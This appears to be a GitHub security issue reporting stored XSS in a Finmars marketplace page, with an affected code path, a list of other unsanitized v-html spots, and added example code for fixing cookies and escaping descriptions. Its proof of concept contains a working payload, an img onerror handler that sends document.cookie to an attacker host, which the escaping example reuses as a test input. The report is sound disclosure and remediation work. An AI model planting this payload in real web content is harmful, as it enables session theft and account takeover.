Stored XSS vulnerability in marketplace item descriptions #37

@Moltivie

Summary

A critical stored XSS vulnerability exists in the marketplace feature that allows attackers to inject malicious JavaScript through marketplace item descriptions, which are rendered unsanitized using v-html.

Vulnerability Details

Location:

<p class="marketplace-item-description" v-html="matchItem.description"></p>

Attack Vector

  1. Data Source: Marketplace items are fetched from external API https://marketplace.finmars.com/api/v1/configuration/{id}/
  2. Attacker Access: Anyone with marketplace publisher credentials can inject malicious content
  3. Publishing Method: Configurations are pushed via pushConfigurationToMarketplace.put endpoint with username/password authentication
  4. Execution: Malicious JavaScript executes when any user views the marketplace item

Impact

  • Stored XSS affecting all users who view the compromised marketplace item
  • Session hijacking - Authentication tokens (access_token, refresh_token, id_token) are accessible via JavaScript (cookies lack httpOnly flag)
  • Account takeover - Attacker can perform actions on behalf of victims
  • Data exfiltration - Sensitive user data can be stolen
  • Phishing - Users can be redirected to malicious sites or shown fake login forms
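The session-hijacking bullet above hinges on the token cookies being readable from JavaScript. The following is an added example, not code from the report or from the Finmars project: a small Node-style helper that serializes a token cookie with HttpOnly, Secure and SameSite set, plus an audit function that reports which of those attributes a given Set-Cookie header line is missing. The cookie names come from the report; the function names, the sample header values and the attribute defaults are assumptions for illustration.

```javascript
// Added example (not part of the original report or the project's code).
// Cookie names are taken from the report; everything else is hypothetical.
const TOKEN_COOKIES = ['access_token', 'refresh_token', 'id_token'];
const REQUIRED_ATTRS = ['HttpOnly', 'Secure', 'SameSite'];

// Serializes one token cookie with the attributes that keep it out of
// document.cookie (HttpOnly) and off plaintext or cross-site requests
// (Secure, SameSite). Defaults are assumptions, not project settings.
function buildSetCookie(name, value, { maxAge = 3600, sameSite = 'Lax', path = '/' } = {}) {
  return `${name}=${encodeURIComponent(value)}; Path=${path}; Max-Age=${maxAge}; HttpOnly; Secure; SameSite=${sameSite}`;
}

// Parses a Set-Cookie header line into the cookie name and a map of
// lower-cased attribute names to their values (true for flag attributes).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eqName = pair.indexOf('=');
  const name = eqName === -1 ? pair : pair.slice(0, eqName);
  const attributes = {};
  for (const attr of attrs) {
    const eq = attr.indexOf('=');
    const key = (eq === -1 ? attr : attr.slice(0, eq)).toLowerCase();
    attributes[key] = eq === -1 ? true : attr.slice(eq + 1);
  }
  return { name, attributes };
}

// Returns the protective attributes missing from a token cookie header.
// An empty array means the cookie is set safely; cookies that are not
// session material (not in TOKEN_COOKIES) are ignored and also return [].
function auditSetCookie(header) {
  const { name, attributes } = parseSetCookie(header);
  if (!TOKEN_COOKIES.includes(name)) return [];
  return REQUIRED_ATTRS.filter((attr) => !(attr.toLowerCase() in attributes));
}

// Constructed sample headers: a token cookie set without any protective
// attributes (the situation the report describes), one built by the helper,
// and an unrelated preference cookie that the audit should not flag.
const SAMPLE_HEADERS = [
  'access_token=sample-token-value; Path=/',
  buildSetCookie('refresh_token', 'sample-refresh-value'),
  'theme=dark; Path=/',
];

for (const header of SAMPLE_HEADERS) {
  const missing = auditSetCookie(header);
  console.log(`${parseSetCookie(header).name}: ${missing.length ? 'missing ' + missing.join(', ') : 'ok'}`);
}
```

The audit is meant to run over the Set-Cookie headers a login response actually returns, so the check can be repeated after the fix to confirm the tokens are no longer exposed to scripts. HttpOnly removes the `document.cookie` exfiltration path; it does not by itself stop an injected script from issuing authenticated requests from the victim's browser, which is why the XSS itself still has to be fixed.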

Proof of Concept

An attacker publishes a marketplace configuration with this description:

Great financial tool!<img src=x onerror="fetch('https://attacker.com/steal',{method:'POST',body:document.cookie})">

When victims browse to /marketplace/{id}, the payload executes and sends their authentication tokens to the attacker.

Reproduction Steps

  1. Create marketplace publisher account on marketplace.finmars.com
  2. Push a configuration with malicious HTML in the description field
  3. Navigate to the marketplace item page as a different user
  4. Observe JavaScript execution in browser console

Affected Code Path

marketplace.finmars.com API
  ↓
useApi('marketplaceItem.get') [line 251]
  ↓
item.value (no sanitization)
  ↓
matchItem computed property [line 239]
  ↓
v-html="matchItem.description" [line 36]
  ↓
XSS EXECUTION
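The code path above ends at `v-html` with nothing between the API response and the DOM. The following is an added example, not code from the report or from the Finmars repository, showing the simplest fix that keeps the template unchanged: escape the description so every tag becomes inert text, and turn only line breaks back into `<br>` so paragraph formatting survives. A second helper flags stored descriptions that already contain markup, for triaging items published before the fix. The function names (`renderDescription`, `looksLikeMarkup`) and the `matchItem` stand-in are assumptions; the first sample description is the payload quoted in the report.

```javascript
// Added example (not the report's or the project's code). Assumes the API
// returns an item object whose `description` is a plain string; `matchItem`
// below is a hypothetical stand-in for the component's computed property.

// Escapes the characters that can open a tag or break out of an attribute.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Renders a publisher-supplied description as inert HTML: all markup is
// escaped, and only newlines are converted to <br>, so the existing
// v-html binding keeps paragraph formatting without executing anything.
function renderDescription(description) {
  return escapeHtml(description ?? '').replace(/\r?\n/g, '<br>');
}

// Audit helper for already-stored items: true when a description contains
// a tag, an on* event handler attribute, or a javascript: URL, so it can be
// reviewed before or after the rendering fix ships.
function looksLikeMarkup(description) {
  const s = String(description ?? '');
  return /<\s*[a-z!/]/i.test(s) || /\bon[a-z]+\s*=/i.test(s) || /javascript\s*:/i.test(s);
}

// Hypothetical stand-in for the component's `matchItem` computed property,
// returning a copy of the item with a safe-to-bind description.
function matchItem(item) {
  return { ...item, description: renderDescription(item.description) };
}

// Constructed samples: the payload quoted in the report, and a benign
// multi-line description with a character that must be escaped.
const SAMPLE_ITEMS = [
  { id: 1, description: 'Great financial tool!<img src=x onerror="fetch(\'https://attacker.com/steal\',{method:\'POST\',body:document.cookie})">' },
  { id: 2, description: 'Portfolio reports\nDaily P&L' },
];

for (const item of SAMPLE_ITEMS) {
  console.log(`item ${item.id}: markup=${looksLikeMarkup(item.description)} -> ${matchItem(item).description}`);
}
```

Escaping is the right default when descriptions are meant to be plain text. If publishers genuinely need formatting (bold, links, lists), the escape step should be replaced by an allowlist sanitizer built on a real HTML parser rather than regular expressions, and the sanitized result cached server-side so the client never receives raw publisher HTML at all.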

Additional Vulnerable Locations

Similar unsanitized v-html usage found in:

  • src/components/modal/DownloadFile.vue:22,30 (CSV file preview)
  • src/components/common/FilePreview.vue:37 (File content preview)
  • src/components/Fm/UnifiedDataSelect/helper.js:8 (Search highlighting)
  • src/stores/useWhiteLabelStore.js:57,61 (Custom CSS injection)

These should be reviewed as part of a comprehensive XSS remediation effort.

Questions

  • Is this behavior intentional? Is there any backend sanitization or validation on the marketplace API that prevents malicious HTML?
  • Are there any access controls or review processes for marketplace publishers that would prevent malicious content?
  • Should HTML formatting be allowed in marketplace descriptions, or should it sanitize/escape all user-provided content?
